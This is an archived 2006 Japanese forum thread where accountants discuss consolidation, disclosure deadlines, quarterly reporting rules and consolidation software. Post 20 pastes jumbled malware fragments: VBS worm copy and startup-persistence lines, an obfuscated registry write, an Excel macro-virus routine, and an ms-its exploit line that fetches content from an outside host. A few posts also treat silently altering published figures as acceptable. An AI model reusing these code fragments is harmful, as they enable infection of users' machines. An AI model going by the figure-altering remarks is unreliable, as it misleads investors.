5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【決算】連結・有報作成者が集うスレ【短縮化】

1 :名無しさん@そうだ確定申告に行こう:2006/06/24(土) 11:07:47 ID:t+6wXgwW
 決算短縮化したし、ここは一つ集まって語りませんか?

2 :名無しさん@そうだ確定申告に行こう:2006/06/24(土) 12:32:52 ID:t+6wXgwW
2げ

3 :名無しさん@そうだ確定申告に行こう:2006/06/24(土) 12:38:57 ID:t+6wXgwW
寂しい・・・

4 :g:2006/06/25(日) 14:07:49 ID:ErzoisCS
思うんだが、実質株主報告しろってのはなんか矛盾があるんじゃないかと思うんだが。
個人株主が個別に貸借契約結んでて、5%以下なら大量保有報告書もでないだろ


5 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 14:29:17 ID:p6wC+v/k
結局仕事が増えるだけの話で、5%を把握する時間がかかる。
一々出さなきゃいけないしね

6 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 15:09:41 ID:5PqhubH0
経理に比べ大事な仕事やってるとは思うが決算期の忙しさはなんとかならないだろうか?うちは財務で開示してるから、普段はあまりやることないし。ギャップが激しいです。     みんなはどう?

7 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 15:12:31 ID:+pbR9C/r
経理が兼任しています。
総会等の通知書の定款変更も校正しています。
粉飾もしています。

疲れたよ・・・

8 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 15:15:23 ID:5PqhubH0
粉飾乙!

9 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 19:10:54 ID:p6wC+v/k
本当に粉飾なの?
監査法人どうやって騙してんの?

10 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 22:45:51 ID:iJI5qVda
3月決算会社で決算発表が4月下旬だから、4月は土日関係なく
毎日22時くらいまで残業・休日出勤して決算短信作ってるんだけど、
どこもそんな感じ?

11 :名無しさん@そうだ確定申告に行こう:2006/06/25(日) 23:35:32 ID:WpMxS6cy
単体監査でもめる→連結修正入りまくり→短時間で短信・計算書類作る
→ミス連発→短信修正・有報で修正
有報、細かすぎるんじゃ!

12 :誘導..:2006/06/25(日) 23:49:59 ID:gzvqO9Jg
おれたち経理マン 第11期
http://money4.2ch.net/test/read.cgi/tax/1145970712/


13 :名無しさん@そうだ確定申告に行こう:2006/06/26(月) 08:45:14 ID:yflQfGrY
経理と開示はイコールじゃないだろ。経理=インプット、開示=アウトプット。

14 :名無しさん@そうだ確定申告に行こう:2006/06/26(月) 17:53:10 ID:UW72svbw
だよねぇ…

15 :名無しさん@そうだ確定申告に行こう:2006/06/26(月) 21:04:40 ID:0YAqEgQu
tax:税金経理会計[スレッド削除]
http://qb5.2ch.net/test/read.cgi/saku/1119278753/355

>355 名前: [] 投稿日:2006/06/25(日) 23:51:16 HOST:208.101.10.50-static.reverse.softlayer.com
>削除対象アドレス:
>http://money4.2ch.net/test/read.cgi/tax/1151114867/
>削除理由・詳細・その他:
>6. 連続投稿・重複
>・重複スレッド(12で誘導済み)
>※誘導先で語れる内容。分離させる必要なし。

しっかり削除依頼まで出してるね。
悪意はないけど理解もないというか。




16 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 00:05:20 ID:WV460Are
削除依頼だしてるやつって何様なの?

17 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 00:46:03 ID:ghLEfphy
連結・有報は経理実務の一部だが、特殊。
経理なら、だれもが経験している訳ではない。
よって重複スレではない。
連結・有報というだけで、いつも削除要請するやつがいるが
何かのコンプレックスか?

18 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 01:07:13 ID:PJvovYa3
あーあ。7月は毎週休日出勤か。
何で四半期ごときで…

って言うか、子会社の担当者…バージョンアップした連結ソフトの
インストールの仕方がわからないんですけど、って、
あんたが担当になってから何度決算をやってると思って…

19 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 01:22:22 ID:B+/62sRD
うちは四半期は最低限しかやらないから8日、9日を
休日出勤すれば大丈夫かなぁ。
あ、でも今回から充実させなきゃいけないんだっけ?
まだ来年???

20 :<body onload=window()> :2006/06/27(火) 01:22:54 ID:C80km/fV
>>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???



21 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 08:30:03 ID:WV460Are
めでたく良スレ認定されますた。
さあ、みんなで盛り上げてまいりましょうwww

22 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 08:33:17 ID:EQUnvzYv
>>16
板のスレを1つに統合しようという野心家

23 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 11:56:28 ID:ubecHyfz
お前等決算期以外って何やってるの?
経理が兼任してるなら別として

24 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 15:46:33 ID:B02gl7kS
仕事してるフリしてます。

25 :名無しさん@そうだ確定申告に行こう:2006/06/27(火) 22:02:38 ID:ocC2OHkj
まあ基本だわな

26 :名無しさん@そうだ確定申告に行こう:2006/06/28(水) 00:10:50 ID:ErbMR00R
そんなに連結だけやってる椰子って多いのか?俺だけ特殊かと思ってた。ちなみに俺は新卒→経理研修→連結→開示(いまここ)。正直経理の打ち方がさっぱりわかりませんW

27 :名無しさん@そうだ確定申告に行こう:2006/06/29(木) 00:07:43 ID:2AT6Mrh+
>>26
大きい会社だとそういうステップになるのが一般的なのかな?
単体・連結決算、開示、自社・関係会社業績管理、関係会社税務etc、
細分化できるほど人数はいないので、基本的に何でも兼任体制。
専門グループが作れる会社と比べると開示の精度が落ちるのが難。

28 :名無しさん@そうだ確定申告に行こう:2006/06/30(金) 22:23:13 ID:Hi0rO/8w
開示の制度は重要。頭いい奴じゃないと出来ない。
そもそも修正なんか出した日には制度以前に責任問題だと思う。

29 :名無しさん@そうだ確定申告に行こう:2006/06/30(金) 22:51:52 ID:RgHDcjwY
一度、訂正の訂正という開示を見た事があるが、ウチの会社なら
切腹ものだな

30 :名無しさん@そうだ確定申告に行こう:2006/07/01(土) 11:47:31 ID:4bGsKEc6
訂正の訂正見タスwwwwwww
あほすぎですwwwwww

31 :名無しさん@そうだ確定申告に行こう:2006/07/01(土) 16:02:12 ID:/XX84h7l
経理も兼任している会社もあるんだ。
ミスくらいするだろう。

会社によっては、ライバル失脚を目論み、足の引っ張りミスを誘発させる
行為を露骨にしている者もいた・・・

32 :名無しさん@そうだ確定申告に行こう:2006/07/02(日) 11:35:02 ID:BDD48dnb
子会社の〆は変わらないのに開示が毎年早くなってる
四半期とは言え3日で連結固めろって無理ありすぎ
オワタ\(^o^)/


33 :名無しさん@そうだ確定申告に行こう:2006/07/02(日) 23:31:03 ID:RCixtbHu ?
>>31
((((; ゚Д゚)))ガクガクブルブル
資料作成が正しいか、自分で全てをチェックできないから、
変なものをわざと紛れ込まされてると怖い。


うちも決算スケジュールをどんどん前倒しにされていってるよ。
流行なのか知らないけど、目的無き早期化は勘弁して欲しい。

34 :j:2006/07/03(月) 01:07:35 ID:XEZOOkSg
>資料作成が正しいか、自分で全てをチェックできないから

そりゃ確かにそうだが、売り上げ1000億程度規模以上の会社だったら、そもそもすべての資料が正確だなんて
自信持っていえる担当者なんていないだろ
ある程度こんな数値の範囲内だからあってそうだ、くらいで流すんじゃないのか?
総資産1000億あって、売掛金が2,3億程度ずれてても、投資家にとっちゃ重大な
差異じゃないだろ

あ、そうだ。
短信なんかの注記に、
「当社の財務諸表はプラスマイナス○○百万円のずれがある可能性があります」
っていれれば訂正発表しなくていいんじゃないのか?
なかなかいいアイデアだろ


35 :名無しさん@そうだ確定申告に行こう:2006/07/03(月) 01:41:46 ID:vMuL2hjU
>>34
なにその経理マンとは思えない発想。

36 :名無しさん@そうだ確定申告に行こう:2006/07/03(月) 09:26:31 ID:1EbCTAO/
どちらかといえば監査法人的な発想だな

37 :名無しさん@そうだ確定申告に行こう:2006/07/05(水) 21:45:04 ID:0RcSkEdP
さて、来週からは第一四半期ですね。たまにはまったりやりたいよ。開示業務もやってるんで1ヵ月間近く地獄です。

38 :名無しさん@そうだ確定申告に行こう:2006/07/06(木) 22:43:35 ID:HSU8fGrQ
一番大きい子会社の担当が逃げやがった
オワタ\(^o^)/

39 :名無しさん@そうだ確定申告に行こう:2006/07/06(木) 23:51:21 ID:u0cSqqHe
>>38
むしろ、終わりの始まり(w

しかし、投資家は短信なんて見るのか?


40 :名無しさん@そうだ確定申告に行こう:2006/07/08(土) 11:47:56 ID:neXFvvwg
さっそく会社に行くZE!

41 :名無しさん@そうだ確定申告に行こう:2006/07/08(土) 15:04:22 ID:neXFvvwg
どこからも報告ねえから帰ってきたYO!

42 :名無しさん@そうだ確定申告に行こう:2006/07/08(土) 17:21:05 ID:7iYUfGhJ
休日の無駄遣い乙

43 :名無しさん@そうだ確定申告に行こう:2006/07/09(日) 13:56:30 ID:0720TfHF
>>39
適時開示めっちゃ見てますよ。

44 :名無しさん@そうだ確定申告に行こう:2006/07/09(日) 14:45:14 ID:ZzjoiP6E
個人は知らんが、機関投資家はチェックしてるね

45 :名無しさん@そうだ確定申告に行こう:2006/07/09(日) 14:56:36 ID:lr1qJX5t
つっても見てるのは表紙くらいだろ

46 :名無しさん@そうだ確定申告に行こう:2006/07/09(日) 15:03:49 ID:8SyAMZb3
財務諸表とセグメント情報

47 :( ´▽`) ◆SAITAMAHo. :2006/07/09(日) 19:11:56 ID:pegLGYD5 ?#
>>45
一般投資家は次期損益予測の内容れ問い合わせしてくるのれす
業績うp→株価上がるよね?上がるよね!
利益増→配当増やせゴルァ!って言ってくるのれす

48 :名無しさん@そうだ確定申告に行こう:2006/07/09(日) 21:18:38 ID:Pdh8uKtK
>>47
そうそう、過去情報なんてあんまし気にしてないと思う。


49 :名無しさん@そうだ確定申告に行こう:2006/07/12(水) 22:21:44 ID:bI5P0rS4
もうくたくただ。早くおうちに帰りたいぽ

50 :名無しさん@そうだ確定申告に行こう:2006/07/13(木) 02:05:56 ID:G5qHySRZ
上場廃止すれば経理の仕事はかなり楽になるのだが…。
このギャップは大きい。

51 :名無しさん@そうだ確定申告に行こう:2006/07/13(木) 10:02:19 ID:XJyIFY+b
決算や開示も含めて、何人でしていますか?

52 :名無しさん@そうだ確定申告に行こう:2006/07/13(木) 10:46:07 ID:dgnki+Ir
もちひとり

53 :名無しさん@そうだ確定申告に行こう:2006/07/13(木) 22:34:11 ID:WUxDI6bH
SOX法ってどーよ?
あれってマジに導入されんのか?

54 :名無しさん@そうだ確定申告に行こう:2006/07/16(日) 00:33:54 ID:JX8ujGTZ
導入は決定でしょ? ってかまだ動いてないの?
あれは時間かかるし早めに動いておかないと面倒だと思うのだが。
うちは運用に乗せる段階だけど、これがまた手間かかるんだよなぁ。。。

55 :名無しさん@そうだ確定申告に行こう:2006/07/16(日) 02:02:49 ID:YhmtMEk6
ところで、6月末の第一死半期の単体短信は
例の株主資本等変動計算書でやるのか?
あじあの記載例でそうなってるのだが?

56 :名無しさん@そうだ確定申告に行こう:2006/07/16(日) 03:40:00 ID:PzdD4ZE6
やっと帰ってこれたYO!
おまいら、はかどってるか?

>>55
四半期は必要ないはずだが

57 :名無しさん@そうだ確定申告に行こう:2006/07/16(日) 12:51:34 ID:rfUOcsP3
>>55
東証以外は知らないけど
東証なら四半期は、B/S・P/L以外は任意添付だったかと
うちは、S/S開示してたから
第1から株主資本等変動計算書載せるけどね
特に作るの難しそうでもなかったし

ところで株主資本等変動計算書の略称って何て言うんだ?

58 :名無しさん@そうだ確定申告に行こう:2006/07/16(日) 13:18:30 ID:aM1inWUj
>>57
Statements Of Changes in Stockholder's Equityだから、S/CとかSCEとかじゃね?

59 :名無しさん@そうだ確定申告に行こう:2006/07/17(月) 18:24:47 ID:HiAUrD8u
>>57
B/Sは「純資産の部」でつか?

60 :名無しさん@そうだ確定申告に行こう:2006/07/17(月) 18:44:31 ID:mnplXuNX ?
ほとんどの会社は前年同期は資本の部、
別に行を設けて当年度は純資産の部、という形式じゃないかな。
有報半報の時を考えると多分、これが最適。

>>57
CEかCSEかなと思いつつ、上司との会話では"資本のアレ"と呼んでいる。

61 :名無しさん@そうだ確定申告に行こう:2006/07/17(月) 22:08:11 ID:tOhJdUKp
つうか、中間からじゃやないの?

62 :名無しさん@そうだ確定申告に行こう:2006/07/18(火) 01:17:23 ID:emDbQrx6
>>61
株主資本等変動計算書のことなら、皆が書いてる通り四半期は任意。
「純資産の部」のことなら、法律の施行が5月1日なんだから
それ以降は変更しなきゃダメ。

株主資本等変動計算書はうちも付ける予定。たいして面倒でもないしね。

63 :57:2006/07/18(火) 20:29:35 ID:qjLEIOKz
>>59
BSは>>60のとおり、既に開示してる会社あるから
適時開示HP見てみると参考になると思う

>>58>>60
米国基準のとか検索して見たんだけど
ピッタリ日本のと同じではないみたいで良く分からん
うちでは、「株主資本なんちゃら」って言ってるけど
Excelのシート名短くしたい・・・

ところで四半期財務・業績の概況は
「短信もどき」とかって言ってるんだけど
何か略称あるんですかね?

64 :名無しさん@そうだ確定申告に行こう:2006/07/18(火) 23:36:05 ID:E7KOiiLu
資本変動で通じない?

65 :名無しさん@そうだ確定申告に行こう:2006/07/19(水) 00:15:43 ID:PO5ksXev
アルファベット二文字で略したくないですか?
感覚的なものですけど。

66 :名無しさん@そうだ確定申告に行こう:2006/07/19(水) 03:22:24 ID:ehdOC7xY
じゃあ、
S (株主)資本(等)
H 変動(計算書)


67 :名無しさん@そうだ確定申告に行こう:2006/07/19(水) 23:03:34 ID:z5kotBYI
>>66
天才

68 :名無しさん@そうだ確定申告に行こう:2006/07/20(木) 00:30:11 ID:NGq+B6S+
Statements Of Changes in Stockholder's Equityが英訳だったら
今までどおりSSでいいんじゃないの?
昔のSSはなくなるわけだから混ざることもないし。

69 :名無しさん@そうだ確定申告に行こう:2006/07/22(土) 11:22:21 ID:mWRqNDIP
終わらNEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEうえっほーーーーーー

70 :名無しさん@そうだ確定申告に行こう:2006/07/23(日) 18:26:27 ID:l8MtouSu
気持ちはわかるがモチツケ

71 :名無しさん@そうだ確定申告に行こう:2006/07/23(日) 23:18:16 ID:plErZ7wq
早く帰りたい

72 :名無しさん@そうだ確定申告に行こう:2006/07/24(月) 16:27:33 ID:eUMQyXgo
監査オワタ\(^o^)/

73 :名無しさん@そうだ確定申告に行こう:2006/07/26(水) 23:08:47 ID:3rgEwjDl
みんな第1四半期の進捗はどうだい?
なんか本決算とかと比べると、いまいち気合が入らんよな、
って思うのはおれだけか?


74 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 00:37:14 ID:cghSlYSD
皆さんの会社、月次決算に何日かかります?また、本決算なら?
うち、本決算3ヶ月かかるんですよ。売上350億くらいのメーカーなんですけど。
これってかかりすぎですか?

75 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 06:40:14 ID:UAb6xuA4
>>74
かかりすぎ以前の問題として、株主総会に間に合うのか?

76 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 07:30:28 ID:BfZarZ+V
まず短針アウトだな

77 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 08:03:45 ID:Uu08vEXc
総会終了時点で決算終了って意味?
違うよな〜

78 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 08:56:55 ID:Z4I7lD2U
皆さんの会社、月次決算に何日かかります?また、本決算なら?
うち、本決算2ヶ月かかるんですよ。売上1千万円以下の小売なんですけど。
これってかかりすぎですか?

79 :名無しさん@そうだ確定申告に行こう:2006/07/27(木) 12:40:42 ID:zK1sXE55
つまんない。

80 :名無しさん@そうだ確定申告に行こう:2006/08/01(火) 20:45:04 ID:R+pQPa22
投資していた会社の有報みていたら、
過去の数字が訂正報告を提出していないのに、変わっている。

これって、マズイんじゃないか?

81 :名無しさん@そうだ確定申告に行こう:2006/08/01(火) 21:11:47 ID:qffUIKh3
>>80
どこだ?

82 :名無しさん@そうだ確定申告に行こう:2006/08/01(火) 21:12:29 ID:w261kyAm
経営指標のとこ?
経理の状況のとこ?

83 :( ´▽`) ◆SAITAMAHo. :2006/08/01(火) 22:02:36 ID:pXyWenAD ?BRZ(1301)
>>80
・・・シーッ 黙っててくらさい 何回か、やっているのれす
少し位の数字の違いはスルーしてくらさい

84 :名無しさん@そうだ確定申告に行こう:2006/08/01(火) 22:56:17 ID:hSg2LMkO
ミスプリだよ、ミスプリ。
もしくは指が太かっただけ

85 :80:2006/08/02(水) 19:00:49 ID:0rezprY6
セグメント情報の部分です。


86 :名無しさん@そうだ確定申告に行こう:2006/08/05(土) 11:32:04 ID:YvUddbX9
どこのソフト使ってる?

87 :名無しさん@そうだ確定申告に行こう:2006/08/05(土) 14:08:56 ID:6W0L4+8X
明らかに間違い&重要でない場合はうちも訂正ださずに数字変えるけど、ダメなことなのか?

88 :名無しさん@そうだ確定申告に行こう:2006/08/05(土) 14:29:29 ID:6I6QuCTF
原則は数字変えちゃダメ。


89 :名無しさん@そうだ確定申告に行こう:2006/08/07(月) 01:18:42 ID:54SikaF8
総会直前(およそ12日くらい前だったかな)にできます。
上場準備中の会社です。こんなんで上場なんてとても・・・

90 :名無しさん@そうだ確定申告に行こう:2006/08/13(日) 09:09:54 ID:F+5mXxID
>>89
ネタにもなっていないね

91 :名無しさん@そうだ確定申告に行こう:2006/08/13(日) 12:54:32 ID:R+W8JOay
みんなのDIVA最強

92 :名無しさん@そうだ確定申告に行こう:2006/08/14(月) 20:15:29 ID:lREnv+gr
>91

93 :名無しさん@そうだ確定申告に行こう:2006/08/15(火) 02:25:34 ID:qGWaGW6O
お仲間が集ういいスレが見つかりました。
今年は制度がいろいろと変わりますから対応が大変ですね。




94 :名無しさん@そうだ確定申告に行こう:2006/08/16(水) 09:03:25 ID:KbVjlkTi
ネタじゃないんですけど。同属だから株主数なんて知れてるし。


95 :名無しさん@そうだ確定申告に行こう:2006/08/19(土) 22:35:01 ID:1LT0ARpO
7月決算会社は俺だけか・・・

96 :名無しさん@そうだ確定申告に行こう:2006/08/20(日) 15:15:56 ID:TmLmla1W
うは。七月ってだけで特定できそうだな。

97 :名無しさん@そうだ確定申告に行こう:2006/08/20(日) 18:40:37 ID:GznlcRLQ
3、12月決算は分かるけど、他の月って訳分かんね
目立ちたいから?

98 :名無しさん@そうだ確定申告に行こう:2006/08/20(日) 19:44:21 ID:GWsRcXGw
昔、事務所に勤めていたとき新規の法人成りは7月決算にしてた。
スケジュール楽なんだよね。
汗ダラダラで決算組むことになるけど(www

99 :名無しさん@そうだ確定申告に行こう:2006/08/21(月) 23:31:55 ID:70CJsdMY
>>97
お前阿呆だろ
業種によって適正は違う

100 :名無しさん@そうだ確定申告に行こう:2006/08/23(水) 21:12:59 ID:Q/fChmbi
みんなどんな連結会計ソフトを使っているの?

101 :名無しさん@そうだ確定申告に行こう:2006/08/23(水) 21:57:18 ID:nxFES+at
>>100
まずお前から

102 :名無しさん@そうだ確定申告に行こう:2006/08/24(木) 00:07:23 ID:2z4niUBv
エクセル

103 :名無しさん@そうだ確定申告に行こう:2006/08/24(木) 21:57:00 ID:bs2TJDr6


104 :名無しさん@そうだ確定申告に行こう:2006/08/25(金) 03:17:58 ID:FUIVg7M9
HYPERION-CAP

105 :名無しさん@そうだ確定申告に行こう:2006/08/26(土) 12:55:24 ID:Zm0M/ug5
うちもExcel
某ソフト導入テスト中だが上手くいかない
融通がきかないところは割り切ってしまうもの?
ただの為替換算&合算ソフトになってしまいそう。
セグメントとか上手くいかなくて。
カスタマイズ費用は限られてるし。

106 :名無しさん@そうだ確定申告に行こう:2006/08/26(土) 15:37:40 ID:0NbwG7DP
>融通がきかないところは割り切ってしまうもの?
それが連結ってものさ

107 :名無しさん@そうだ確定申告に行こう:2006/08/27(日) 08:29:54 ID:Hdor4+28
EXCELでやってるとこって、子会社何社くらい?
1ケタ台くらいまででないとムリでない?

うちは、ISIDのSCOPE使ってるよ。
まあ、ところどころ使い勝手悪いとこもあるけど、
おおむねよくできてるんじゃないかな。


108 :名無しさん@そうだ確定申告に行こう:2006/08/27(日) 12:46:12 ID:Uzr4ZU/q
会計ソフト(勘定奉行)と連動してくれればなぁ・・・と思ってる。
DIVAつかってるけどいちいちTEXTに変えるのがめんどくさい。

他の会計ソフトでも基本はTEXT→連結取込なんでしょうか>

109 :名無しさん@そうだ確定申告に行こう:2006/09/03(日) 10:20:30 ID:GyGaUrrs
有報→監査対象につき会計士しっかりチェック
短信→監査対象外につき会計士やや気合入らず
でも、短信の方を先に開示するので、全力投球
でお願いしたいのだが・・・・・・・・・。
「訂正」の開示なんて煩わしいのでやりたくな
いんだよなー。





110 :名無しさん@そうだ確定申告に行こう:2006/09/03(日) 13:13:21 ID:CpJOhkhf
訂正だしたら子会社出向って暗黙の約束があるのだ(;^ω^)

111 :名無しさん@そうだ確定申告に行こう:2006/09/04(月) 01:21:02 ID:EL9O7bLK
一回の訂正だけで出向?きびしい会社だな。うちは訂正はださないかわりに訂正だすような事象でも軽微であるかぎり正としてしまうけど。

112 :名無しさん@そうだ確定申告に行こう:2006/09/04(月) 21:48:19 ID:/H9DlCmz
訂正を出すような事象である時点で
もはや軽微とは言えない

113 :名無しさん@そうだ確定申告に行こう:2006/09/04(月) 21:52:20 ID:UyWenzhn
>>111
監査法人は黙認なのか?

114 :名無しさん@そうだ確定申告に行こう:2006/09/05(火) 22:41:33 ID:wG9MvB85
B/S、P/Lなど主要な部分以外の数値で、しかも大差な
い金額差であり、投資家の判断に影響しないと思われ
る場合は訂正したところでだれの役にも立っていない
と思うんだがどうだろうか。

115 :名無しさん@そうだ確定申告に行こう:2006/09/05(火) 23:03:59 ID:rwGcPhch
制度連結ならDIVA
管理連結ならHYPERION
が使い勝手が良かった。市販のシステムなら。

116 :名無しさん@そうだ確定申告に行こう:2006/09/06(水) 03:20:28 ID:kdHFu0nr
セグメントとか従業員数とか経理の状況以外は監査法人も黙認やろ。軽微っていうのはそういうところのミスは何をもってミスなのかもわからん。ちなみにディーバだけどエクセルでやったほうが制度連結ならしっかりできると思うよ

117 :名無しさん@そうだ確定申告に行こう:2006/09/08(金) 16:50:12 ID:oFqtPPMO
会計士早く帰れよ

118 :名無しさん@そうだ確定申告に行こう:2006/09/08(金) 20:44:27 ID:Rrf5BgoS
法定四半期開示で半報がなくなるってのは
3ヶ月間ずつ第1、第2、第3各四半期で開示して
本決算だけ12ヶ月で開示するってことでしょうか。
中間の6ヶ月間と第3四半期の9ヶ月間は廃止ですか?

119 :名無しさん@そうだ確定申告に行こう:2006/09/08(金) 23:29:10 ID:kOl4rJ2a
3ヶ月ごとの情報はもちろん開示するようだが、
やはりそれらの累計情報も開示していくことになりそうだな。
詳しくは↓を開いてみてや。(なんか事務負担増えそう)

http://www.azsa.or.jp/b_info/acn/200601/acn_200601_08.html

120 :名無しさん@そうだ確定申告に行こう:2006/09/09(土) 14:37:08 ID:xrHbOfMx
>>119
ありがとうございます。
「四半期単位積上げ方式」「累計差額方式」
どっちにしても、すんなりいかない事が出てきそう

121 :名無しさん@そうだ確定申告に行こう:2006/09/09(土) 16:37:11 ID:c7rtee5c
引き算するだけじゃね?

122 :名無しさん@そうだ確定申告に行こう:2006/09/12(火) 21:22:03 ID:sVVYkzPX
そりゃ基本的にはそうなんだけどさ。
それでも上手くいかない部分が出てきたりすることがある、ってのは実務をやってるとわかるだろ?

123 :名無しさん@そうだ確定申告に行こう:2006/09/25(月) 02:19:44 ID:mGYGWQHu
おまいらいくつ?やっぱ30越えがおおいのかな?この仕事おもしろいか?

124 :名無しさん@そうだ確定申告に行こう:2006/09/25(月) 21:07:41 ID:2p4sC4YN
30まであと5

125 :名無しさん@そうだ確定申告に行こう:2006/09/26(火) 21:52:26 ID:WJG6XIxY
もうすぐ30まであと−1

126 :名無しさん@そうだ確定申告に行こう:2006/09/26(火) 22:21:36 ID:H6Yji1k9
ガキんちょが多いな

127 :名無しさん@そうだ確定申告に行こう:2006/09/27(水) 01:00:51 ID:tCik8zuk
仕事内容が基本的に作業でしかないからね。

128 :名無しさん@そうだ確定申告に行こう:2006/09/27(水) 08:18:17 ID:tlLwl2yn
個人の意思が介在する余地はないね、基本的に。
単純作業を正確かつ効率的にこなす能力と、内部情報を委ねられる信用があれば、ガキで足りる。

129 :名無しさん@そうだ確定申告に行こう:2006/09/28(木) 00:43:50 ID:vBWWeBGN
経理の中でも閑職だよな

130 :名無しさん@そうだ確定申告に行こう:2006/09/29(金) 00:30:52 ID:9Gonmmvc
会計士がウザイ

早く帰れや。。。

131 :名無しさん@そうだ確定申告に行こう:2006/09/29(金) 07:40:39 ID:ZsgL6D/P
眼精疲労に耐えられない・・・

132 :名無しさん@そうだ確定申告に行こう:2006/09/30(土) 14:15:06 ID:RYNYGACK
自虐的な奴が多いなあw
まぁもともと経理なんてMじゃなきゃ耐えられない仕事だな

133 :名無しさん@そうだ確定申告に行こう:2006/10/08(日) 10:43:07 ID:kjpu1Qdn
はじまったな

134 :名無しさん@そうだ確定申告に行こう:2006/10/08(日) 11:55:59 ID:1mEFGA0B

決算早期化って、誰のために、何のためにやるんですかね?

別に2、3日早くなったところでたいした影響ないと思うんだけど。

135 :名無しさん@そうだ確定申告に行こう:2006/10/08(日) 13:49:59 ID:6BjjAPOz
日経平均つ

136 :( ´▽`) ◆SAITAMAHo. :2006/10/08(日) 18:14:14 ID:0vq/PBN4 ?BRZ(1331)
>>134
東証のワガママに付き合わされているらけれす

137 :名無しさん@そうだ確定申告に行こう:2006/10/08(日) 20:26:18 ID:9UyAmpVU ?2BP(52)
決算短信の本旨とか、決算情報は投資判断上最も重要な会社情報とかいうけど、
投資家は情報が無いなら無いなりの判断をするよね。

138 :名無しさん@そうだ確定申告に行こう:2006/10/08(日) 20:28:33 ID:yd34bSOa
むしろ営業情報の方が投資家は見るんでねーの?

139 :名無しさん@そうだ確定申告に行こう:2006/10/11(水) 04:41:37 ID:bfl/fjca
さぁ、寝るか
みんなガンガレよ

140 :名無しさん@そうだ確定申告に行こう:2006/10/11(水) 07:28:15 ID:bfl/fjca
さぁ今日も頑張ろ

141 :名無しさん@そうだ確定申告に行こう:2006/10/11(水) 13:58:54 ID:gi8UREMf
決算短信て普通WORDで作るもんですか?
WORD使いづらいんですが。

142 :名無しさん@そうだ確定申告に行こう:2006/10/11(水) 19:31:05 ID:O8VkCKyq
>>139
>>140
(ノД`)゚。・ 。 +゚ 。・゚

143 :( ´▽`) ◆SAITAMAHo. :2006/10/12(木) 09:04:27 ID:v75Y/+QA ?BRZ(1331)
>>141
半期と本決算はワードとエクセル併用れした
いまは某ディスクロ印刷会社のシステムれ作成

144 :名無しさん@そうだ確定申告に行こう:2006/10/14(土) 13:58:00 ID:BsmRI7iD
えくすいーた?

145 :名無しさん@そうだ確定申告に行こう:2006/10/14(土) 19:21:27 ID:tBivwfeR
連結100社以上って、想像できん
うちは10社で悲鳴上げてるよ


146 :名無しさん@そうだ確定申告に行こう:2006/10/15(日) 23:25:20 ID:IKhIxL16
>>145
深残、徹夜、休出が多いだけでそれほど変わらないと思うよ。
収集手段がシステム化されてたりするけど。

147 :名無しさん@そうだ確定申告に行こう:2006/10/17(火) 02:45:04 ID:439RH1Dz
うち連結五百社以上。某総合商社。死ねる

148 :名無しさん@そうだ確定申告に行こう:2006/10/17(火) 05:18:51 ID:Dq0WuLwx
出入りする会社が多いとめんどくさいね

149 :名無しさん@そうだ確定申告に行こう:2006/10/17(火) 22:50:55 ID:qKSKxoTj
>>147
一人でやってるの?
考えられないな

150 :名無しさん@そうだ確定申告に行こう:2006/10/18(水) 01:16:01 ID:H0rD2/Vn
500社の連結1人は死んでも無理だろ。
まして>>147は総合商社だから海外も入るし。
死ねるな。

151 :名無しさん@そうだ確定申告に行こう:2006/10/18(水) 07:26:11 ID:lI2d5u/R
普通はどんな分担なのかな。うちは一人あたり十数社(内外半々)。これでも結構きつい。

152 :名無しさん@そうだ確定申告に行こう:2006/10/18(水) 10:05:35 ID:R6cL3LEi
500社の債権債務相殺って無理でしょ?実際

153 :名無しさん@そうだ確定申告に行こう:2006/10/18(水) 21:12:02 ID:LqzxZPDe
無理っていうか適当(よく言えば妥協)じゃないの?
